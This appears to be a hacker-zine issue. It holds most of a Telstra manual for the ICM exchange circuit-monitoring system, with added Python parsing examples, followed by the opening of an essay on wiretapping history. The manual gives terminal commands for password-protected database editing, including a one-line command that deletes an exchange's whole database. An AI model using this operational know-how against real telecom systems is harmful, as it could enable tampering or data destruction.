    Q-Keyclick:Disabled
    U-Break Key:enabled
    Y-Keypad mode:numeric

    ***Printer Settings :
    B-Pitch Mode:All pitches
    C-G0 Character set:United States
    D-G1 Character set:United States
    G2 Character set:United States
    G3 Character set:United States
    F-Form Length:264
    H-Horizontal pitch (cpi):10
    J-End of line control:wrap mode
    V-Vertical pitch (lpi):6
    W-NewLine request char:none

    ***Communications Settings :
    A-Auto-answerback:Disabled
    N-Disconnect on EOT:Disabled
    O-Paper fault on processing:XOFF (if enabled)
    P-Parity:7/E
    R-Reciever error:Print block error
    S-Speed:1200
    X-Auto XON/XOFF:Enabled
    Z-Modem control:No Modem Control-Restraint

Any departure from these settings must be corrected.
Refer:- LETTER WRITER 100 GUIDE Chapter 3.

After storing any new configurations exit SETUP and return the printer to
the ON LINE condition.


3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI)

3.1 GENERAL

The CCI provides a general interface between the ICM computer and the
Exchange ICM equipment. The CCI gives the Central computer the ability to
collect the data gathered by the ICMMs and to send reports back to the
CCI.

The CCI also provides various functions to the local Exchange staff. By
entering commands at the printer/terminal or by selecting lines from the
front panel, local staff can also interrogate, monitor and test circuits.

3.1.1 Power Up

When the CCI is powered up or a break occurs in the power supply a
message is printed out to that effect with the date, time and amount of
memory available.

The CCI is very susceptible to noise and breaks on the power supply, for
example when starting and running emergency power supplies. If the CCI
powers down and then up again all data collected previously is lost. This
should be kept in mind as it is the usual reason for loss of reports or
reports which state that all poll data is missing.

3.1.2 Diagnostics

Should an error occur during power up the error condition will be
displayed on the two 7 segment LEDs on the front panel of the CCI.

    7 segment display    Meaning
    r0                   ROM Checksum fault
    r1                   RAM1 Fault
    r2                   RAM2 Fault
    rF                   64K RAM Fault

If no errors are detected then the letters 'PF' are displayed and the
internal audible alarm is activated. To reset the alarm press the
'LAMPS/BUZZER' key. The LED display should now be slowly rotating.

3.2 FRONT PANEL

3.2.1 Idle LED Pattern

Slowly rotating indicates processor is running.

3.2.2 Modem LEDs

The following LEDs are alight if the modem is correctly connected and
functioning :-

    DTR, RTS, CD, DSR and CTR

3.2.3 Printer/Terminal Port

Refer to 2.2 for configuration of the printer. If the printer is
correctly configured and connected then the 'PRINTER ON-LINE' LED should
glow.
3.2.4 GPIB Ports

When everything is running normally the 'POLLING' LED for the GPIB should
be flickering to indicate data transfer between CCI and the ICMMs. Should
a GPIB 'FAULT' LED glow, refer to 3.3.1

3.2.5 Push Buttons

    - Select GPIB. Refer 3.3.1
    - Select ICMM. Refer 3.3.1
    - Select Line. Refer 3.3.1 and 3.4
    - Disable Printer. Used to inform the CCI that the printer is out for
      maintenance or faulty. The Central computer will hold all reports
      until the printer is enabled again.
    - Lamps/Buzzer. Has two functions:-
          Checks that all LEDs are OK.
          Resets acoustic alarm.

3.3 ERROR DIAGNOSTICS

In addition to the error diagnostics described during powerup, the CCI
continually monitors the state of the ICMMs. If they fail in any way a
message is printed out informing the local staff of the type of error.

    Message                   Meaning
    ICMM not communicating    No CCI-ICMM communication. Usually means
                              that the ICMM is switched off or the GPIB
                              cable is disconnected.
    Configured ICMM           The CCI has recognised that the ICMM has
                              powered-up or that the Central computer has
                              re-configured the CCI and ICMMs.
    Failed to config ICMM     The CCI has failed to find the ICMM's
                              configurations.
    ICMM fail..ROM            ICMM ROM in error.
    ICMM fail..RAM            Faulty ICMM RAM
    ICMM fail..timer          Faulty ICMM timer chip
    ICMM fail..GPIA           ICMM GPIB chip fail
    ICMM fail..DMAC           Direct memory access chip faulty
    ICMM fail..unknown        Undetermined hardware fault

When such errors occur, if the ICMMs involved are in the CCI Group
definitions, then a status message is automatically sent to the Central
computer.

3.3.1 GPIB Monitoring

If an error occurs in an ICMM then the 'FAULT' LED on the CCI front panel
glows. The push buttons can be used to locate where the fault occurred.

The 'SELECT GPIB' button is used to select one of three GPIB ports. The
GPIB selected is displayed in the 7 segment LEDs - 1, 2 or 3.
If the CCI detected an actual GPIB port failure in the CCI, then the
letters 'HF' (hardware) or 'CF' (controller) would toggle with the GPIB
number in the LED display. If no error is detected then only the GPIB
number would be shown.

The 'SELECT ICMM' button is used to select one of fourteen possible ICMMs
on the previously selected GPIB. The ICMM number is shown in hexadecimal.
(Refer to Appendix B). If the selected GPIB had a hardware fault then the
ICMMs are marked unequipped and the letters 'nE' would toggle with the
ICMM number. If the GPIB hardware is OK, but the CCI can't talk with the
ICMM, then the letters 'nC' would toggle.

3.4 LINE TESTING

Local staff can monitor the state of a particular line via the front
panel of the CCI. To select a line the user must select the GPIB and ICMM
as described above and then select the line with the 'SELECT LINE'
button. The line number is displayed in hexadecimal. The LED above the
'SELECT LINE' button will be on when the line is seized and off when the
line is idle.

Holding the 'SELECT LINE' button operated will cycle very rapidly through
all the lines on the ICMM. The 7 segment LEDs return to rotating state
after a short interval.


4. INDIVIDUAL CIRCUIT MONITORING MODULES

4.1 GENERAL

The CCI communicates with the ICMMs via 3 GPIB buses. Each GPIB supports
up to 14 ICMMs, a maximum of 42 ICMMs per CCI. Each ICMM monitors a
maximum of 256 lines. A CCI has a capacity of 10,752 lines.

The ICM rack contains a Terminal Unit frame which has a capacity of 14
ICMMs maximum. On this basis, a CCI can support 3 ICM racks, each with a
maximum of 14 ICMMs. If 2-3 racks are installed, only the first rack is
equipped with a CCI.

The ICMMs are numbered from right to left, looking from the front of the
rack.

4.2 INSTALLATION

4.2.1 Precautions

As the ICMM is a big board, care must be taken when installing them in
the Terminal Unit Frame. Use Anti-static precautions.
Ensure the ICMM power On/Off switch (top-front of the ICMM) is OFF before
installing or removing.


5. SYSTEM OPERATION

5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL

5.1.1 General

Various functions can be performed by entering commands on the
printer/terminal. These commands do not affect the polling between the
Central Computer and the CCI.

After power up the CCI is placed in the IDLE mode. This is the normal
mode and the CCI must always be returned to this condition. The IDLE mode
is indicated by the prompt:-

    IDLE >

In this mode, local staff can make enquiries about the state of the
system.

5.2 IDLE MODE COMMANDS

5.2.1 Listing Configurations

Print all the Group Definitions stored in the CCI. Enter the command:-

    L

5.2.2 ICMM Status Report

An ICMM status table, giving the state of the 42 ICMMs, can be printed by
entering:-

    ICMM

A detailed report on a particular ICMM can be printed with the command:-

    ICMM where = 1..42.

eg ICMM 8 will print the status of ICMM 8

5.2.3 Central Computer Link Status

The state of the communication link to the Central computer can be
printed with the command:-

    SA

5.2.4 Central Computer Link Statistics

The transmission statistics are printed with :-

    SS

5.2.5 Dynamic Memory Status

The current state of the dynamic memory pool:-

    MEM

5.2.6 Time Request

The current CCI time:-

    T

5.2.7 Poll Status

The current Central polling status:-

    P

5.2.8 Request Group Report

To obtain a listing of the groups relevant to CCI, from the Central
Computer, enter:-

    GREP

5.2.9 Request Transaction Report

Refer to 5.3.2 Transaction Mode. To obtain a list of the transactions
waiting for processing, enter:-

    TREP

5.2.10 Help

To list all the commands, their format and meanings, enter:-

    H

5.3 SPECIAL MODE COMMANDS

From the IDLE mode the CCI can be placed in other special modes. A
listing of commands relevant to that mode can be obtained with the Help
command.

5.3.1 Local Poll Mode

This mode is used to poll a single ICMM for the pegcount/usage data, or
poll a Group of lines.
The mode is entered using the command:-

    POLL

and exited with a CTRL+E. When the Poll mode is entered the prompt
returned is :-

    POLL >

5.3.1.1 Polling An ICMM

Enter the following command:-

    I

Where  icmm no.  = 1..42
       ref type  = ACT for active register
                 = IDL for idle register
       lines     = 1 to 254

e.g. I 4 ACT 1 10 = ICMM 4 ACT lines 1 to 10.

5.3.1.2 Polling a Group

Enter the following command:-

    G

where local group ref is the group number register type. See 5.3.1.1.

eg G 22 ACT = Group 22, Active registers.

The local group reference number can be obtained by using the 'L' command
in the IDLE mode.

5.3.1.3 Swapping Registers

This function should not be used as it affects the data stored in the
idle regs. It is password protected at the Central site.

5.3.2 Transactions Mode

This mode is used to update the ICM database. At this stage it is not
intended to be used in WA. The mode is password protected. See Section 6.
DATABASE MANAGEMENT for the current method of creating and updating the
database.

It is imperative when using Transaction Mode to be fully conversant with
the database structure and to exercise extreme care. If a reasonable
degree of logic is not used then the entire database for the Exchange
will be corrupted.

Enter the following command:-

    TRANS

Prompt is:-

    password?

If the password is entered correctly the returned prompt is:-

    TRAN >

The user now has the authority to modify the ICM database for the
Exchange. When all the transactions have been entered, and the mode
exited with CTRL+E, they are transmitted to the Central computer and
stored. The Central computer will inform the user of any errors in the
transactions but not incorrect data. The next time the Central Computer
updates the Group Definitions, they will be sent down to the CCI.

Only a certain size buffer has been allocated for these transactions. If
the buffer fills, then the message 'Buffer Full' is printed. To clear the
buffer, exit the mode and then re-enter to continue with further
transactions.
5.3.2.1 Content Of Transactions

Transactions contain both Group and Line information. Each transaction
must be prefixed with one of the following symbols :-

    '+' = Create/modify
    '-' = Delete
    '*' = Wildcard symbol for special use

5.3.2.2 Create/Modify a Group

Before adding a Group, or adding/removing lines in a Group, the Group
name must be specified, and prefixed accordingly. eg.

    + PRTA T PRTA-PRTH C1

5.3.2.3 Deleting a Group

The Group name must be specified. eg.

    - PRTA T PRTA-PRTH C1

This action will remove the group name and all lines in the Group, if
they exist.

5.3.2.4 Creating a Line

The Group name must exist and be specified then the new Line name can be
entered.

    + PRTA T PRTA-PRTH C1
    + 102054 034 7 9B 21

The Line name format is as follows :-

    +          Add
    1          The CCI number in the Exchange
    04051      The ICMM and inlet numbers (ICMM=04, I/L=051)
    034        The Circuit or traffic number
    7 9B 21    The suite, rack and R/S

5.3.2.5 Modifying a Line

The same rules apply as for 5.3.2.4:-

    + PRTA T PRTA-PRTH C1     (Modify Group)
    - 104051 034 7 9B 21      (Delete old line)
    + 108088 034 5 6A 18      (Add new line)

5.3.2.6 Deleting an Exchange

This transaction will delete the entire Exchange database. Use with
care!!

    * PRTA

5.3.2.7 Editing Transactions

Editing of the transactions entered can be performed before they are sent
to the Central Computer. Use the command :-

    L

The CCI will list out the transactions in the order they were entered,
giving a line number for each. The line number can be used to delete, and
insert new transactions within the list.

    To delete:- Enter D
    To insert:- Enter I followed the transaction. [sic - dunno]

5.3.3 Remote Terminal Mode

This mode has not been implemented. It is password protected.

5.3.4 Message Mode

5.3.4.1 General

This mode can be used to send messages to the Central site. The messages
appear on the Central Computer VDU. Command is:-

    MESSAGE

and the prompt returned is:-

    MESS >

Enter your message, terminating each line with a return.
Transmit the message with a double return.

    MESS > Hello Central site.
    Goodbye.
    CTRL+E

5.3.4.2 Editing Messages

Limited facilities are provided to edit messages before transmission. To
list the lines of text of the message enter:-

    L

The CCI will print the message with line numbers. The line number can be
used to delete or insert lines of text in the message.

To delete a line, enter:-

    D

To insert a line, enter:-

    I followed by the text.

5.3.5 Test Mode

This mode can be used to observe the change of state of lines in an ICMM.
As the line/s change they are printed out. eg,

    Line 2 On
    Line 8 Off
    Line 2 Off
    Line 6 On

Enter the mode with the command:-

    TEST

A prompt is returned:-

    TEST >

Enter ICMM

eg, ICMM 2 1 10 = ICMM 2 inlets 1 to 10

To stop testing, enter CTRL+E. A new set of inlets can now be checked. To
exit Test mode, enter CTRL+E.

5.3.6 Communications Mode

This mode is used during the commissioning.

5.4 EXITING MODES

When the user has finished performing functions in one of the modes
previously described, the mode MUST be exited with the keys:-

    CTRL+E

The CCI will respond with the IDLE prompt.


6. DATABASE MANAGEMENT

6.1 GENERAL POLICY

All updating of the ICM Database in WA will be done by the central site
staff as will be the initial loading of data for each new site.

6.2 NEW INSTALLATIONS

When a new site is first equipped the Installation team will notify the
central site staff of the group name information and line details by
means of forms WG4372 shts 5-8. These forms, once completed, will be
forwarded to the central site at the following address.

    OIC NTMC
    13th FLOOR, 639 WELLINGTON ST
    PERTH 6000

6.3 AMENDING EXISTING DATABASES

The local exchange staff will be responsible for notifying the central
site staff of any changes to their data. This is done by means of form
EW325 supplied in book form from the central site.
On receipt of an update advice form the central site staff will amend the
data base and send a group report to the exchange (group numbering
changes as additions or deletions are made to the data base).

6.4 CODING OF DATA FOR ICM

Although the central site staff will check any data before entering it
into the database, time and effort can be reduced by coding the data in a
format suitable for ICM. Appendix (A) describes the coding principles
used in WA for the ICM database.

Exchange staff should be aware that it can take several days to enter the
changes into their database due to central site staff having to
thoroughly check the data in order to avoid corruption of the database.


7. ICM REPORTS

7.1 GENERAL

The ICM System gathers pegcount and usage data from all the exchanges,
according to a Poll/Report schedule. The Schedule is arranged to
automatically send reports at realistic times. Typically these times are
set to cover busy traffic periods and a 3-4 hour poll period is usually
chosen.

The Report Schedule can be modified to suit the needs of an Exchange. Any
of the following Report types can be generated, and sent to the Exchange.
There are some limitations which will be discussed later on.

7.2 REPORT TYPES

Currently, there are only four report types supplied by the manufacturer
of the ICM system.

7.2.1 Exception Report

This is a report that highlights suspect circuits. Only those circuits
whose behaviour departs from preset thresholds are listed. Typical
thresholds and their settings are :-

    LOW PEGCOUNT (LP)  :- Less than 1 call an hour.
    HIGH PEGCOUNT (HP) :- More than 50 calls an hour.
    LOW HOLDING (LH)   :- Less than 30 sec. per call.
    HIGH HOLDING (HH)  :- More than 3550 sec. per call.
    LOW USAGE (LU)     :- Less than 50 sec. an hour.
    HIGH USAGE (HU)    :- More than 3550 sec. an hour.
    ALWAYS IDLE (AI)   :- Never seized.
    ALWAYS BUSY (AB)   :- Permanently held.
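
The threshold check behind an Exception Report, sketched in Python as an
added example (not code from the ICM system or the original document). The
poll figures, the second group and its tuned thresholds are constructed, and
treating a line with no seizures but a full period of usage as Always Busy
is an assumption.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Thresholds:
    """Limits for one group; defaults are the typical settings listed above."""
    low_pegcount: float = 1       # LP: fewer calls than this per hour
    high_pegcount: float = 50     # HP: more calls than this per hour
    low_holding: float = 30       # LH: fewer seconds than this per call
    high_holding: float = 3550    # HH: more seconds than this per call
    low_usage: float = 50         # LU: fewer busy seconds than this per hour
    high_usage: float = 3550      # HU: more busy seconds than this per hour


def classify_line(pegcount, usage_secs, poll_hours, t=Thresholds()):
    """Return the exception codes for one line over one Poll period."""
    period = poll_hours * 3600
    if poll_hours <= 0 or pegcount < 0 or not 0 <= usage_secs <= period:
        raise ValueError("pegcount/usage inconsistent with the Poll period")
    if pegcount == 0 and usage_secs == 0:
        return ["AI"]                       # never seized
    if pegcount == 0 and usage_secs == period:
        return ["AB"]                       # assumption: held for the whole period
    flags = []
    per_hour = pegcount / poll_hours
    if per_hour < t.low_pegcount:
        flags.append("LP")
    if per_hour > t.high_pegcount:
        flags.append("HP")
    if pegcount:                            # holding time needs at least one call
        holding = usage_secs / pegcount
        if holding < t.low_holding:
            flags.append("LH")
        if holding > t.high_holding:
            flags.append("HH")
    usage_per_hour = usage_secs / poll_hours
    if usage_per_hour < t.low_usage:
        flags.append("LU")
    if usage_per_hour > t.high_usage:
        flags.append("HU")
    return flags


def exception_report(groups, poll_hours, thresholds_by_group=None):
    """List only the lines that depart from their group's thresholds.

    groups: {group name: {line name: (pegcount, usage_secs)}}
    """
    report = {}
    for group, lines in groups.items():
        t = (thresholds_by_group or {}).get(group, Thresholds())
        suspects = {}
        for line, (pegcount, usage) in sorted(lines.items()):
            flags = classify_line(pegcount, usage, poll_hours, t)
            if flags:
                suspects[line] = flags
        if suspects:
            report[group] = suspects
    return report


# Constructed figures for a 3 hour Poll period (not real exchange data).
SAMPLE_POLL = {
    "PRTA T PRTA-PRTH C1": {
        "001": (45, 5400),     # 15 calls/hour, 120 s/call: nothing to report
        "002": (0, 0),         # never seized
        "003": (0, 10800),     # held for the whole period
        "004": (240, 2400),    # many very short calls
        "005": (2, 10700),     # two very long calls
        "006": (3, 90),        # barely used
    },
    # A common control lead is seized far more often than a traffic circuit,
    # so its group gets its own limits (constructed values).
    "PRTA S REG-Y1 TKM5": {"001": (3000, 6000)},
}
TUNED = {"PRTA S REG-Y1 TKM5": Thresholds(high_pegcount=2000, low_holding=1)}

if __name__ == "__main__":
    for group, suspects in exception_report(SAMPLE_POLL, 3, TUNED).items():
        print(group)
        for line, flags in suspects.items():
            print("   ", line, " ".join(flags))
```

Line 005 shows the limitation noted in 1.1.4: two long but valid calls are
reported exactly as a circuit that is not releasing would be.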
These settings can vary from Group to Group, hour by hour, and day by
day, depending on the Group type and the average traffic pattern over a
period of time. These thresholds will require a lot of "fine tuning" to
avoid listing non-faulty circuits.

An Exception Report can be generated for one or more groups in an
Exchange. It is not possible to report on an individual circuit in a
group. This is the most common type of report.

7.2.2 Detailed Report

A Detailed report lists each circuit in a group or groups regardless of
whether they are exceptions or not. Not normally sent to an Exchange due
to the length of the report, but available on request.

7.2.3 Group Summary Report

A Group Summary report lists all the groups in the Exchange database,
with the number of circuits, the always idle, always busy, average hold
time, and erlangs carried by the Group. [wtf is an erlang?] Not normally
sent but available on request.

7.2.4 Crossed Leads

This report compares the pegcount and usage figures of all circuits and
then lists those with identical figures. It is not inferred that circuits
with the same figures are necessarily crossed. If the same two circuits
appear on subsequent reports then it is a fair assumption. Not run
normally as it is very slow but available on request.


8. HARDWARE MAINTENANCE AND ROUTINE CHECKS

8.1 GENERAL

Exchange and ICM equipment is NOT covered by a maintenance contract and
all repair is a Telstra cost. No attempt must be made to repair the CCI
or ICMMs. Any abnormal ICM equipment behaviour should be referred to the
NTMC OIC on 08 9420 7027. The NTMC OIC will determine the appropriate
action to be taken.

8.2 PROVEN FAULTY EQUIPMENT

8.2.1 ICMM

Any proven faulty ICMM should be replaced with a spare board ordered from
the Central Parts Store. The OIC NTMC will authorise the dispatch of a
replacement board and the return of the faulty board to the Central Parts
Store. The Exchange will arrange the transport of a faulty item by a
suitable carrier.
8.2.2 CCI

The OIC NTMC will arrange for the dispatch of a spare CCI from the
Central Parts Store as for faulty ICMM boards.

8.2.3 PRINTER

The printer is maintained by the Business Network Branch and all faults
should be reported to 1107. The supply of paper and ribbons is the
responsibility of the Exchange.

8.3 ALARMS

The ICM internal alarms have not been connected to the main Exchange
alarms due to lack of software details.

8.4 ROUTINE CHECKS

The CCI and printer should be checked regularly (daily).

8.4.1 CCI

Ensure that the following LEDs on the front panel are on:-

    The 2.7 segment display is slowly rotating.
    Printer ON-LINE
    Modem (except RI)
    GPIB POLLING (flickering)

8.4.2 ICMM

Check that there are no alarm LEDs on.

8.4.3 PRINTER

Check that the printer is

    on LINE
    In IDLE mode.
    Has plenty of paper.


9. FAULT FINDING (Using ICM Reports and Local Functions)

9.1 GENERAL

The ICM system does not find or localise faults. It can only highlight
possible faulty circuits. Due to the averaging technique used, the
thresholds set for each group of lines by the Central site, and the need
for a very accurate database, the first occurrence of a faulty line in a
report should not be of great concern. When a circuit starts to appear
regularly, then it is time to act.

Generally, the longer the Poll period the better. This enables the system
to gather more data and provide much bigger samples.

9.2 FAULT TYPES

9.2.1 ALWAYS IDLE

Any circuit consistently indicating AI could be in one of the following
conditions :-

Incoming Circuit

    - Blocked at distant end.
    - Blocked at I/C relayset
    - Relayset (either end) unplugged or not equipped
    - Bearer fault
    - New circuit (in database but not in service)
    - Old circuit (not in service but in database)
    - Being seized for less than 2 seconds
    - Database incorrect
    - Wiring to ICMM incorrect

Outgoing Circuit

    - The above
    - GV grading fault

9.2.2 ALWAYS BUSY

    - Not releasing
    - Data circuit that has not been released
    - Bearer fault

9.2.3 HIGH PEGCOUNT, LOW HOLDING (HP and LH)

Depending on the average hold-time, the circuit may be suffering from one
of the following symptoms :-

    - Very low holding. Noisy bearer
    - Approx 7-10 seconds. MFC failure
    - Approx 90 seconds. Timing out due to no answer
    - Between 90 seconds. Timing out due to no answer
    - Between 30-60 seconds. Call to Service Operator
    - Approx 10-20 seconds. TRT running

9.2.4 LOW PEGCOUNT, HIGH HOLDING (LP and HH)

    - Not releasing properly, waiting until forced
    - Non STD route
    - One or more very long calls in the Poll period

9.2.5 LOW PEGCOUNT, NORMAL HOLDING

    - Out of traffic for part of Poll Period
    - Grading anomaly (if Crossbar)
    - Late choice SxS circuit

9.2.6 HIGH PEGCOUNT, NORMAL HOLDING

    - Grading anomaly (if crossbar)
    - Early choice SxS circuit


APPENDIX A

1. CODING OF DATA FOR ICM

1.1 INTRODUCTION

This section describes the coding principles used to enter data into the
WA ICM data base. Information is entered onto a series of forms (WG 4372
shts 5 to 8) by the installation team or forms EW325 by operations staff.
These forms are then forwarded to the Central Site staff for uploading
into the ICM database.

GROUP DEFINITIONS

Each group definition in ICM consists of a Group Name, Threshold, Line
Configuration, Inlet and Line Name. The installer need only fill in the
details for the group line and group name as listed under the heading
DEVICE on WG 4372. The other details will be coded by the central site
staff.

1.3 GROUP NAME

The following syntax has been adopted for creating group names in ICM.
    character   character   character   character   character
    group 1     group 2     group 3     group 4     group 5

    AAAA        B           CCCC    -   DDDD        EEEE

    Character Group 1 -- (AAAA) -- 4 alpha -- ICM monitoring point.
        Location name code, normally the LRD or MJR code for the station.
    Character Group 2 -- (B) -- 1 alpha -- Group type.
        Normally "T" for a traffic circuit or "S" for a statmeter or
        common control.
    Character Group 3 -- (CCCC) -- 4 alphanumeric -- Originating/control
        station or Common Control 1.
    Character Group 4 -- (DDDD) -- 4 alphanumeric -- Terminating/Non
        Control station or Common Control 2.
    Character Group 5 -- (EEEE) -- 4 alphanumeric -- Route or Common
        Control designation.

The coding of traffic groups (ie, where Character Group 2 = T) is fairly
straightforward. eg. Where the traffic group is between Katanning ARM
(KATA) and Bunbury ARM (BBRA) and the monitoring is being carried out at
Katanning the coding would be

    KATA T KATA-BBRA M1

Permissible values for Character Group 5 when a traffic circuit is being
monitored are as follows (n = The number of the group, * = space.)

    Fn**    ARF terminating
    Cn**    10C terminating
    Mn**    ARM terminating
    KN**    ARK terminating
    ZnI*    Bothway circuit incoming
    ZnU*    Bothway circuit outgoing
    Qn**    Queue position
    Xn**    PABX circuit
    Pn**    SPC terminating
    Sn**    Entraide junctions

All definitions are available from LRD (Country) or MJR (Metro).

1.3 THRESHOLD

The threshold is a number which indicates the threshold table to be used
in the ICM system. In WA this is normally set to 00.

1.4 LINE CONFIGURATION

The Line Configuration field is used to set the parameters that the ICM
will monitor. In WA this is usually set to LE256 for a traffic group and
LE005 for a common control group. The first character (L) indicates that
we are monitoring the Leading edge of the transition, the second
character (E) indicates that the pulse should be an Earth pulse and the 3
digit number is the timer in milliseconds that the change of state needs
to exist to be recognised as an event.
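
An added example, not part of the original document or the ICM software: a
Python parser for the Group Name, Threshold and Line Configuration fields as
described in 1.3 and 1.4. The function names are hypothetical; the digit
counts allowed for the group number and reading KN** as Kn** are
assumptions.

```python
import re

# Character Group 5 codes for traffic groups, from the table above.
# "KN**" is read as "Kn**" like its neighbours (assumption).
ROUTE_KINDS = {
    "F": "ARF terminating", "C": "10C terminating", "M": "ARM terminating",
    "K": "ARK terminating", "Q": "Queue position", "X": "PABX circuit",
    "P": "SPC terminating", "S": "Entraide junctions",
}
BOTHWAY = {"I": "Bothway circuit incoming", "U": "Bothway circuit outgoing"}

# Group Name, optionally followed by Threshold and Line Configuration.
# Fields are written without their space padding, as in the examples.
DEFINITION_RE = re.compile(
    r"(?P<point>[A-Z]{4})\s+(?P<type>[A-Z])\s+"
    r"(?P<orig>[A-Z0-9]{1,4})\s*-\s*(?P<term>[A-Z0-9]{1,4})\s+"
    r"(?P<desig>[A-Z0-9]{1,4})"
    r"(?:\s+(?P<threshold>\d{2})\s+(?P<config>[A-Z]{2}\d{3}))?"
)


def decode_route(designation):
    """Decode Character Group 5 of a traffic ("T") group."""
    m = re.fullmatch(r"Z(\d{1,2})([IU])", designation)
    if m:
        return {"kind": BOTHWAY[m.group(2)], "number": int(m.group(1))}
    m = re.fullmatch(r"([FCMKQXPS])(\d{1,3})", designation)
    if m:
        return {"kind": ROUTE_KINDS[m.group(1)], "number": int(m.group(2))}
    raise ValueError(f"unknown traffic route code: {designation!r}")


def parse_line_config(field):
    """Decode a Line Configuration such as LE256."""
    m = re.fullmatch(r"([A-Z])([A-Z])(\d{3})", field)
    if not m:
        raise ValueError(f"malformed Line Configuration: {field!r}")
    edge, pulse, timer = m.groups()
    # Only L (Leading edge) and E (Earth pulse) are documented on this page,
    # so anything else is rejected rather than guessed at.
    if edge != "L" or pulse != "E":
        raise ValueError(f"undocumented Line Configuration: {field!r}")
    return {"edge": "leading", "pulse": "earth", "timer_ms": int(timer)}


def parse_definition(text):
    """Split 'KATA T KATA-BBRA M1 00 LE256' into its coded fields."""
    m = DEFINITION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"not a group definition: {text!r}")
    result = {
        "monitoring_point": m["point"],
        "group_type": m["type"],
        "originating": m["orig"],
        "terminating": m["term"],
        "designation": m["desig"],
    }
    if m["type"] == "T":          # the route table applies to traffic groups
        result["route"] = decode_route(m["desig"])
    if m["threshold"] is not None:
        result["threshold_table"] = int(m["threshold"])
        result["line_config"] = parse_line_config(m["config"])
    return result


if __name__ == "__main__":
    for sample in ("KATA T KATA-BBRA M1 00 LE256", "PRTA T PRTA-PRTH C1"):
        print(parse_definition(sample))
```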
1.5 INLET

The ICM Inlet field is made up of:

    The Exchange Name -- 4 alpha   -- (LRD code for the Exchange)
    The CCI Number    -- 1 numeric -- in the range 1 to 3
    The ICMM Number   -- 2 numeric -- in the range 1 to 42
    The Line Number   -- 3 numeric -- in the range 1 to 256

1.6 LINE NAME

The line name consists of up to 25 characters, the first 3 of which must
be numeric. This field is usually set out in the following manner.

For traffic groups.

    Circuit or trunk number -- 3 numeric
    Suite or route number   -- 3 numeric or 4 alphanumeric for 10C
    Rack                    -- 3 numeric or I/U for 10C
    Position or junctor     -- 3 numeric or 4 Hex address for 10C

In the case of outgoing circuits from PRTA only the Route Number is added
to the end of this field in the manner VRnnn.

The overall line entry for the previous example in sect 4.3 might look
like this;

    KATA T KATA-BBRA M1 00 LE256 KATA 1 20 120 001 05A 004 021

A similar example for a 10C circuit might look like this;

    PRTH T PRTH-BBRA M1 00 LE256 PRTH 1 25 123 001 R036 U 0AB4

1.7 CODING OF COMMON CONTROL MONITORING POINTS

When the points being monitored are not traffic groups but are leads from
the common control equipment, the coding for the data base becomes
somewhat different. Character groups 3 and 4 will now represent the item
of equipment being monitored. Permissible values and their meanings are
listed below. (n = numeric character, * = space, # = alpha character.)
    character   character        equipment
    group 3     group 4

    GVn*        KMRn             GVM 1/80 GV MARKER
    GVn*        XY**             GVM 2/160 GV MARKER
    H4**        REGn             REG-H4
    #H4*        GUXY             REG-H4-XY
    #SS**       LPnn             SS 16/40
    #REG*       LPnn             REG-LP / REG-E-LP
    #AN**       KSnn             AN-KS PT 1
    #AN**       REGn             AN-REG PT 1
    #KS**       LPnn             KS
    #DS**       ****             DS
    #RSI*       LPnn             RSM

                Common Control Equipt in MSE's

    M***        ****             MARKER
    VM**        ****             ROUTE MARKER
    KSR*        ****             CODE SENDER
    AN**        ****             ANALYSER
    RSI*        Y1** or Y2**     REGISTER FINDER MARKER
    RA**        ****             REGISTER ANALYSER MARKER
    SSAB        ****             SENDER FINDER (SSA/B)
    REG*        Y1nn             REGISTER Y1
    REG*        Y2nn             REGISTER EH2Y2
    RTC*        ****             ROUTE TIME CONGESTION LEAD

                Common Control Equipment in ARM's

In all cases of common control equipment coding the next field, character
group 5, is used to describe the lead being monitored, e.g. TKM1, SM2,
DL, etc. The Circuit or trunk number column in the line name field is
used to indicate the number of the item of equipment. No other columns
are required for common control coding.

A group name entry for the second Register Y1 in an ARM then may be coded
as follows;

    PRTA S REG - Y1 TKM5 002.

[EOF - Marlinspike 4/5/00 - World Ends Tomorrow!]


........[ A look into wiretapping ]...................[ psyops ]............

Wiretapping is the traditional term for interception of telephone
conversations. This should not be taken too literally. The word is no
longer restricted to communications traveling by wire, and contemporary
wiretaps are more commonly placed on radio links or inside telephone
offices. The meaning has also broadened in that the thing being tapped
need no longer be a telephone call in the classic sense; it may be some
other form of electronic communication, such as fax or data.

Compared with the more precise but more general phrase "communications
interception," the word "wiretapping" has two connotations. Much the
stronger of these is that a wiretap is aimed at a particular target, in
sharp contrast to the "vacuum cleaner" interception widely practiced by
national intelligence agencies.
The weaker connotation is that it is being done by the police.

The history of wiretapping in the United States is in fact two histories
intertwined. It is a history of wiretapping per se--that is, a history of
the installation and use of wiretaps by police, intelligence agencies,
honest citizens, businesses, and criminals. It is also a history of
society's legal response to wiretapping by these various groups.

The origins of wiretapping lie in two quite different practices:
eavesdropping and letter opening. "Eavesdropping," although once more
restricted in meaning, has come to describe any attempt to overhear
conversations without the knowledge of the participants. "Letter opening"
takes in all acquisition, opening, reading, and copying of written
messages, also without knowledge of the sending and receiving parties.
Telecommunication has unified and systematized these practices.

Before the electronic era, a conversation could only be carried on by
people located within earshot of each other, typically a few feet apart.
Neither advanced planning nor great effort on the part of the participants
was required to ensure a high degree of security. Written communications
were more vulnerable, but intercepting one was still a hit-or-miss affair.
Messages traveled by a variety of postal services, couriers, travelers,
and merchants. Politically sensitive messages, in particular, could not be
counted on to go by predictable channels, so special couriers were
sometimes employed. And written messages enjoyed another sort of
protection. Regardless of a spy's skill with flaps and seals, there was no
guarantee that, if a letter was intercepted, opened, and read, the victim
would not notice the intrusion. Since spying typically has to be done
covertly in order to succeed, the chance of detection is a substantial
deterrent.

Electronic communication has changed all this in three fundamental ways:
it has made telecommunication too convenient to avoid; it has, despite
appearances, reduced the diversity of channels by which written messages
once traveled; and it has made the act of interception invisible to the
target.

Conversation by telephone has achieved an almost equal footing with
face-to-face conversation. It is impossible today to run a successful
business without the telephone, and eccentric even to attempt to do
without the telephone in private life. The telephone provides a means of
communication so effective and convenient that even people who are aware
of the danger of being overheard routinely put aside their caution and use
it to convey sensitive information.

As the number of channels of communication has increased (there are now
hundreds of communication companies, with myriad fibers, satellites, and
microwave links), the diversity of communication paths has diminished. In
the days of oxcart and sail, there was no registry of the thousands of
people willing to carry a message in return for a tip from the recipient.
Today, telecommunications carriers must be registered with national and
local regulatory bodies and are well known to trade associations and
